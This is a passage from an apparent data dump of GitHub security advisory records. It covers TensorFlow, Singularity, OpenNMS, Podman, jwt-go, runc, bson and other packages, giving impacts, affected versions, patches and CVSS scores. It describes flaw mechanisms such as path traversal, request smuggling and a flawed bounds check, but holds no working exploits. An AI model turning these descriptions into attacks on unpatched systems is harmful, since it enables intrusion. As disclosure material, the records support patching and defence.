[validation](https://github.com/tensorflow/tensorflow/blob/eccb7ec454e6617738554a255d77f08e60ee0808/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L74-L77) uses `||` to mix two different conditions: + +```cc +OP_REQUIRES(ctx, + (axis_ == -1 || axis_ < input.shape().dims()), + errors::InvalidArgument(...)); +``` + +If `axis_ < -1` the condition in `OP_REQUIRES` will still be true, but this value of `axis_` results in heap underflow. This allows attackers to read/write to other data on the heap. + +### Patches +We have patched the issue in GitHub commit [c5b0d5f8ac19888e46ca14b0e27562e7fbbee9a9](https://github.com/tensorflow/tensorflow/commit/c5b0d5f8ac19888e46ca14b0e27562e7fbbee9a9). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mq5c-prh3-3f3h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29610'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c5b0d5f8ac19888e46ca14b0e27562e7fbbee9a9'}]","{'cwe_ids': ['CWE-665', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:05:10Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-7gcp-w6ww-2xv9,2021-05-21T22:17:06Z,2021-05-24T16:59:53Z,,['CVE-2020-15229'],Path traversal and files overwrite with unsquashfs in singularity,"### Impact + +Due to insecure handling of path traversal and the lack of path sanitization within `unsquashfs` (a distribution provided utility used by Singularity), it is possible to overwrite/create any files on the host filesystem during the extraction of a crafted squashfs filesystem. + +Squashfs extraction occurs automatically for unprivileged execution of Singularity (either `--without-suid` installation or with `allow setuid = no`) when a user attempts to run an image which: + +- is a local SIF image or a single file containing a squashfs filesystem +- is pulled from remote sources `library://` or `shub://` + +Image build is also impacted in a more serious way as it is often performed by the root user, allowing an attacker to overwrite/create files leading to a system compromise. Bootstrap methods `library`, `shub` and `localimage` trigger a squashfs extraction. + +### Patches + +This issue is addressed in Singularity 3.6.4. + +All users are advised to upgrade to 3.6.4 especially if they use Singularity mainly for building image as root user. + +### Workarounds + +There is no solid workaround except to temporarily avoid use of unprivileged mode with single file images, in favor of sandbox images instead. Regarding image build, temporarily avoid building from `library` and `shub` sources, and as much as possible use `--fakeroot` or a VM to limit potential impact. + +### For more information + +General questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the: + +* [Singularity Slack Channel](https://bit.ly/2m0g3lX) +* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity) + +Any sensitive security concerns should be directed to: security@sylabs.io + +See our Security Policy here: https://sylabs.io/security-policy","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.1'}, {'fixed': '3.6.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-7gcp-w6ww-2xv9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15229'}, {'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/pull/5611'}, {'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/commit/eba3dea260b117198fdb6faf41f2482ab2f8d53e'}, {'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/blob/v3.6.4/CHANGELOG.md#security-related-fixes'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00070.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00071.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00009.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:17:06Z', 'nvd_published_at': '2020-10-14T19:15:00Z'}" +1.4.0,GHSA-jmv4-73v2-pvgc,2021-05-28T22:27:11Z,2021-05-25T18:46:58Z,,['CVE-2021-25929'],Cross-site Scripting in OpenNMS Horizon,"In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting since there is no validation on the input being sent to the `name` parameter in `noticeWizard` endpoint. Due to this flaw an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '27.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25929'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/66c1f626bf38a7d1a9530b4d68598269ee5245a2'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25929'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:29:06Z', 'nvd_published_at': '2021-05-20T15:15:00Z'}" +1.4.0,GHSA-grh6-q6m2-rh72,2023-09-18T19:30:49Z,2021-05-18T21:07:49Z,,['CVE-2021-20199'],Podman Origin Validation Error,"Rootless containers run with Podman, receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.01) connections by default and do not require authentication. This issue affects Podman versions from 1.8.0 to 3.0.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containers/podman/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20199'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/issues/5138'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/pull/9052'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/pull/9225'}, {'type': 'WEB', 'url': 'https://github.com/rootless-containers/rootlesskit/pull/206'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1919050'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/releases/tag/v3.0.0-rc3'}]","{'cwe_ids': ['CWE-200', 'CWE-346'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:02:35Z', 'nvd_published_at': None}" +1.4.0,GHSA-5r2v-6gm6-vpvh,2021-05-17T16:36:54Z,2021-05-18T17:33:58Z,,['CVE-2019-14544'],Insecure Permissions in Gogs,"routes/api/v1/api.go in Gogs 0.11.86 lacks permission checks for routes: deploy keys, collaborators, and hooks.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.91'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14544'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/issues/5764'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/commit/c3af3ff1d0484de3bd789ee6c6e47f35d590e945'}]","{'cwe_ids': ['CWE-200'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T16:36:54Z', 'nvd_published_at': None}" +1.4.0,GHSA-grv5-w5vr-8h98,2021-04-20T19:42:45Z,2021-05-10T18:47:29Z,,['CVE-2020-7757'],Path Traversal in droppy,This affects all versions of package droppy. It is possible to traverse directories to fetch configuration files from a droopy server.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'droppy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '12.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7757'}, {'type': 'WEB', 'url': 'https://github.com/silverwind/droppy/blob/master/server/server.js%23L845'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DROPPY-1023656'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T19:42:45Z', 'nvd_published_at': '2020-11-02T22:15:00Z'}" +1.4.0,GHSA-w73w-5m7g-f7qc,2023-08-29T18:46:17Z,2021-05-18T21:08:21Z,,['CVE-2020-26160'],Authorization bypass in github.com/dgrijalva/jwt-go,"jwt-go allows attackers to bypass intended access restrictions in situations with `[]string{}` for `m[""aud""]` (which is allowed by the specification). Because the type assertion fails, """" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check. There is no patch available and users of jwt-go are advised to migrate to [golang-jwt](https://github.com/golang-jwt/jwt) at version 3.2.1","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/dgrijalva/jwt-go'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/dgrijalva/jwt-go/v4'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0-preview1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26160'}, {'type': 'WEB', 'url': 'https://github.com/dgrijalva/jwt-go/issues/422'}, {'type': 'WEB', 'url': 'https://github.com/dgrijalva/jwt-go/issues/462'}, {'type': 'WEB', 'url': 'https://github.com/dgrijalva/jwt-go/pull/426'}, {'type': 'WEB', 'url': 'https://github.com/dgrijalva/jwt-go/commit/ec0a89a131e3e8567adcb21254a5cd20a70ea4ab'}, {'type': 'PACKAGE', 'url': 'https://github.com/dgrijalva/jwt-go'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0017'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMDGRIJALVAJWTGO-596515'}]","{'cwe_ids': ['CWE-287', 'CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:54:59Z', 'nvd_published_at': '2020-09-30T18:15:00Z'}" +1.4.0,GHSA-cq77-8jpx-892g,2022-07-05T17:39:04Z,2021-05-06T15:53:32Z,,['CVE-2021-23381'],Command Injection in killing,"This affects all versions of package killing up to and including 1.0.6. If attacker-controlled user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'killing'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23381'}, {'type': 'PACKAGE', 'url': 'https://github.com/xudafeng/killing'}, {'type': 'WEB', 'url': 'https://github.com/xudafeng/killing/blob/672ed164ccdd10c0a8fb93c5c6d2456f1dfab781/lib/killing.js%23L62'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KILLING-1078532'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/killing'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T21:07:27Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-46f2-3v63-3xrp,2022-08-15T20:01:42Z,2021-05-06T15:01:36Z,,['CVE-2021-28966'],Tempfile on Windows path traversal vulnerability,"There is an unintentional directory creation vulnerability in `tmpdir` library bundled with Ruby on Windows. And there is also an unintentional file creation vulnerability in tempfile library bundled with Ruby on Windows, because it uses tmpdir internally. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'tmpdir'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28966'}, {'type': 'WEB', 'url': 'https://github.com/ruby/tmpdir/pull/8'}, {'type': 'WEB', 'url': 'https://github.com/ruby/tmpdir/commit/93798c01cb7c10476e50a4d80130a329ba47f348'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1131465'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/tmpdir'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/tmpdir/CVE-2021-28966.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/tmpdir'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210902-0004/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/04/05/tempfile-path-traversal-on-windows-cve-2021-28966/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T15:01:12Z', 'nvd_published_at': '2021-07-30T14:15:00Z'}" +1.4.0,GHSA-6h7w-fc84-x7p6,2021-05-27T21:17:06Z,2021-05-28T15:54:39Z,,['CVE-2021-32643'],StaticFile.fromUrl can leak presence of a directory,"### Impact + +`StaticFile.fromUrl` can leak the presence of a directory on a server when the `URL` scheme is not `file://`, and the URL points to a fetchable resource under its scheme and authority. The function returns `F[None]`, indicating no resource, if `url.getFile` is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL would return a stream, and the path in the URL exists as a directory on the server, the presence of the directory on the server could be inferred from the 404 response. The contents and other metadata about the directory are not exposed. + +This affects http4s versions: +* 0.21.7 through 0.21.23 +* 0.22.0-M1 through 0.22.0-M8 +* 0.23.0-M1 +* 1.0.0-M1 through 1.0.0-M22 + +### Patches + +The [patch](https://github.com/http4s/http4s/commit/52e1890665410b4385e37b96bc49c5e3c708e4e9) is available in the following versions: + +* v0.21.24 +* v0.22.0-RC1 +* v0.23.0-RC1 +* v1.0.0-M23 + +Note: a previous version of this advisory incorrectly referred to 0.22.0-M9 and 0.23.0-M2. + +### Workarounds + +Don't call `StaticFile.fromUrl` with non-file URLs. + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [the http4s repository](https://github.com/http4s/http4s) +* Disclose further vulnerabilities according to the [http4s security policy](https://github.com/http4s/http4s/blob/main/SECURITY.md) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.21.7'}, {'fixed': '0.21.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.22.0-M1'}, {'fixed': '0.22.0-RC1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.22.0-M8'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.23.0-M1'}, {'fixed': '0.23.0-RC1'}]}], 'versions': ['0.23.0-M1']}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0-M1'}, {'fixed': '1.0.0-M23'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-M22'}}]","[{'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-6h7w-fc84-x7p6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32643'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/commit/52e1890665410b4385e37b96bc49c5e3c708e4e9'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/org.http4s/http4s-core'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:17:06Z', 'nvd_published_at': '2021-05-27T18:15:00Z'}" +1.4.0,GHSA-9mx2-prfp-8hqp,2021-04-21T20:37:29Z,2021-05-10T18:38:47Z,,['CVE-2020-7742'],Prototype Pollution in simpl-schema,This affects the package simpl-schema before 1.10.2. Attacker controlled input into a schema could result in remote code execution within the scope of the surrounding application.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'simpl-schema'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7742'}, {'type': 'WEB', 'url': 'https://github.com/longshotlabs/simpl-schema/commit/50128841fa7fc2d137c36a397054279144caea3d'}, {'type': 'WEB', 'url': 'https://github.com/longshotlabs/simpl-schema/releases/tag/1.10.2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SIMPLSCHEMA-1016157'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T20:37:29Z', 'nvd_published_at': '2020-10-07T09:15:00Z'}" +1.4.0,GHSA-fh74-hm69-rqjw,2023-08-28T21:55:51Z,2021-05-27T18:41:17Z,,['CVE-2019-19921'],opencontainers runc contains procfs race condition with a shared volume mount,"### Impact +By crafting a malicious root filesystem (with `/proc` being a symlink to a directory which was inside a volume shared with another running container), an attacker in control of both containers can trick `runc` into not correctly configuring the container's security labels and not correctly masking paths inside `/proc` which contain potentially-sensitive information about the host (or even allow for direct attacks against the host). + +In order to exploit this bug, an untrusted user must be able to spawn custom containers with custom mount configurations (such that a volume is shared between two containers). It should be noted that we consider this to be a fairly high level of access for an untrusted user -- and we do not recommend allowing completely untrusted users to have such degrees of access without further restrictions. + +### Patches +This vulnerability has been fixed in `1.0.0-rc10`. It should be noted that the current fix is effectively a hot-fix, and there are known ways for it to be worked around (such as making the entire root filesystem a shared volume controlled by another container). We recommend that users review their access policies to ensure that untrusted users do not have such high levels of controls over container mount configuration. + +### Workarounds +If you are not providing the ability for untrusted users to configure mountpoints for `runc` (or through a higher-level tool such as `docker run -v`) then you are not vulnerable to this issue. This exploit requires fairly complicated levels of access (which are available for some public clouds but are not necessarily available for all deployments). + +Additionally, it appears as though it is not possible to exploit this vulnerability through Docker (due to the order of mounts Docker generates). However you should not depend on this, as it may be possible to work around this roadblock. + +### Credits +This vulnerability was discovered by Cure53, as part of a third-party security audit. + +### For more information +If you have any questions or comments about this advisory: +* [Open an issue](https://github.com/opencontainers/runc/issues/new). +* Email us at [dev@opencontainers.org](mailto:dev@opencontainers.org), or [security@opencontainers.org](mailto:security@opencontainers.org) if you think you've found a security bug.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:U/RC:U'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc9.0.20200122160610-2fc03cc11c77'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/security/advisories/GHSA-fh74-hm69-rqjw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19921'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/issues/2197'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/pull/2190'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/pull/2207'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/2fc03cc11c775b7a8b2e48d7ee447cb9bef32ad0'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0688'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0695'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/releases'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0087'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2019-19921'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202003-21'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4297-1/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00018.html'}]","{'cwe_ids': ['CWE-362', 'CWE-706'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:20:41Z', 'nvd_published_at': '2020-02-12T15:15:00Z'}" +1.4.0,GHSA-x3v4-pxvm-63j8,2023-01-23T20:29:58Z,2021-05-24T18:13:36Z,,['CVE-2020-7659'],HTTP Request Smuggling in reel,"reel through 0.6.1 allows Request Smuggling attacks due to incorrect Content-Length and Transfer encoding header parsing. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TECL smuggling attacks. Note, This project is deprecated, and is not maintained any more.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'reel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7659'}, {'type': 'PACKAGE', 'url': 'https://github.com/celluloid/reel'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-RUBY-REEL-569135'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-14T17:59:38Z', 'nvd_published_at': '2020-06-01T13:15:00Z'}" +1.4.0,GHSA-5gm6-r79q-hfgw,2021-05-21T23:08:20Z,2021-05-24T16:58:32Z,,['CVE-2020-12697'],Denial of service in direct_mail,The direct_mail extension through 5.2.3 for TYPO3 allows Denial of Service via log entries.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'directmailteam/direct-mail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12697'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-005'}]","{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T23:08:20Z', 'nvd_published_at': '2020-05-13T13:15:00Z'}" +1.4.0,GHSA-v8w9-2789-6hhr,2023-03-30T22:46:24Z,2021-05-07T16:04:54Z,,['CVE-2020-7610'],Deserialization of Untrusted Data in bson,"All versions of bson before 1.1.4 are vulnerable to Deserialization of Untrusted Data. The package will ignore an unknown value for an object's _bsontype, leading to cases where an object is serialized as a document rather than the intended BSON type.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bson'}, 'ecosystem_specific': {'affected_functions': ['bson.BSON.serialize']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7610'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/js-bson/commit/3809c1313a7b2a8001065f0271199df9fa3d16a8'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BSON-561052'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T23:40:10Z', 'nvd_published_at': '2020-03-30T19:15:00Z'}" +1.4.0,GHSA-434h-p4gx-jm89,2021-08-31T21:20:11Z,2021-05-27T18:38:36Z,,['CVE-2021-29621'],Observable Response 